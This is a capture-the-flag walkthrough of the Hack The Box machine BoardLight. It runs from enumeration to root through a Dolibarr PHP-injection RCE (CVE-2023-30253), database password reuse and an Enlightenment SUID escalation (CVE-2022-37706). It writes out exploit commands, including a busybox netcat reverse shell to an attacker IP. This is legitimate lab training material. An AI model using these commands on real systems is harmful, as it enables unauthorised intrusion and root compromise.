BoardLight — Hack The Box

Info	Value
OS	Linux (Ubuntu)
Difficulty	Easy
IP	10.129.231.37
Hostname	board.htb
Services	SSH (22), HTTP/Apache (80)

Enumeration

See also: Network Discovery & Scanning and Reconnaissance-and-Information-Gathering

Nmap

nmap -sC -sV -p- -vvv -oA scan/nmap.scan 10.129.231.37

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)

Open ports:

22/tcp — OpenSSH 8.2p1 Ubuntu → SSH Notes
80/tcp — Apache httpd 2.4.41

Directory Bruteforce

feroxbuster -u http://10.129.231.37/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x js,html,php,txt,json,docx -o scan/root.dir

Nothing relevant — static pages (index.php, about.php, contact.php, do.php).

sudo tee -a /etc/hosts <<< "10.129.231.37  Board.htb"

VHost Enumeration

ffuf -H "Host: FUZZ.Board.htb" -H "User-Agent: PENTEST" -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://Board.htb/ -fs 15949

Found: crm.Board.htb (Status: 200, Size: 6360)

sudo tee -a /etc/hosts <<< "10.129.231.37  crm.Board.htb"

Foothold — Dolibarr RCE

Deep dive: Web-Application-Security and Server-Side-Vulnerabilities

Dolibarr 17.0.0 — Default Credentials

Navigating to http://crm.Board.htb we find a login panel for Dolibarr ERP/CRM 17.0.0.

Trying default credentials: admin:admin — valid login.

CVE-2023-30253 — PHP Code Injection

Vulnerability

Dolibarr ⇐ 17.0.0 is vulnerable to Remote Code Execution via PHP code injection. The vulnerability exploits a case-sensitive manipulation of the <?PHP (uppercase) tag to bypass the filter that blocks <?php (lowercase) in the web page editor.

Ref: https://github.com/Rubikcuv5/cve-2023-30253

Setup exploit

git clone https://github.com/Rubikcuv5/cve-2023-30253.git
cd cve-2023-30253
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt

Exploitation

Listener listening:

nc -lvnp 80

Exploit execution:

python3 CVE-2023-30253.py --url http://crm.board.htb -u admin -p admin -c "busybox nc <ATTACKER_IP> 80 -e /bin/bash"

busybox nc

busybox nc is more reliable than the standard netcat version on targets — it supports the -e flag for shell exec, which many nc/ncat installations disable by default.

Reverse shell obtained as www-data.

Shell Stabilization

python3 -c 'import pty;pty.spawn("/bin/bash")'
# Ctrl+Z
stty raw -echo; fg
export TERM=xterm

User — larissa

Password Reuse from conf.php

Technique: Code Repository Mining

Reading the Dolibarr configuration:

www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php

Database credentials found:

Field	Value
DB User	`dolibarrowner`
DB Pass	`serverfun2$2023!!`
DB Name	`dolibarr`
DB Host	`localhost:3306`

User Enumeration

From /etc/passwd, the only user with a home directory and bash shell is larissa (uid 1000).

SSH with Password Reuse

The database password also works for the larissa user:

ssh larissa@Board.htb
# Password: serverfun2$2023!!

User flag in /home/larissa/user.txt.

Privilege Escalation

Methodology: Privilege Escalation Vectors

SUID Enumeration

Search for binaries with the SUID bit active:

find / -perm -4000 -type f 2>/dev/null

Among the results, binaries of Enlightenment (window manager) stand out:

SUID Binary	Path
`enlightenment_sys`	`/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys`
`enlightenment_ckpasswd`	`/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd`
`enlightenment_backlight`	`/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight`
`freqset`	`/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset`

CVE-2022-37706 — Enlightenment SUID Exploit

Vulnerability

Enlightenment v0.25.3 and earlier — the enlightenment_sys binary (SUID root) allows privilege escalation via path manipulation in the mount command. The exploit creates a path /dev/../tmp/ that bypasses checks and allows mounting an arbitrary filesystem, enabling code execution as root.

Ref: https://github.com/junnythemarksman/CVE-2022-37706

Exploitation

nano exploit.sh    # paste the script from the exploit
chmod +x exploit.sh
bash ./exploit.sh

CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Welcome to the rabbit hole :)
If it is not found in fstab, big deal :D
mount: /dev/../tmp/: can't find in /etc/fstab.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)

Root flag in /root/root.txt.

Attack Chain Summary

Footer leak (Board.htb) → VHost enum (crm.Board.htb) → Dolibarr 17.0.0
       ↓
  Default creds (admin:admin) → CVE-2023-30253 RCE → www-data
       ↓
  conf.php → DB password reuse → SSH larissa → user.txt
       ↓
  SUID enum → Enlightenment binaries → CVE-2022-37706 → root

SverzBlog

Explorer

BoardLight - HTB

BoardLight — Hack The Box

Enumeration

Nmap

Directory Bruteforce

FQDN from Footer

VHost Enumeration

Foothold — Dolibarr RCE

Dolibarr 17.0.0 — Default Credentials

CVE-2023-30253 — PHP Code Injection

Setup exploit

Exploitation

Shell Stabilization

User — larissa

Password Reuse from conf.php

User Enumeration

SSH with Password Reuse

Privilege Escalation

SUID Enumeration

CVE-2022-37706 — Enlightenment SUID Exploit

Exploitation

Attack Chain Summary

Graph View

Table of Contents

Backlinks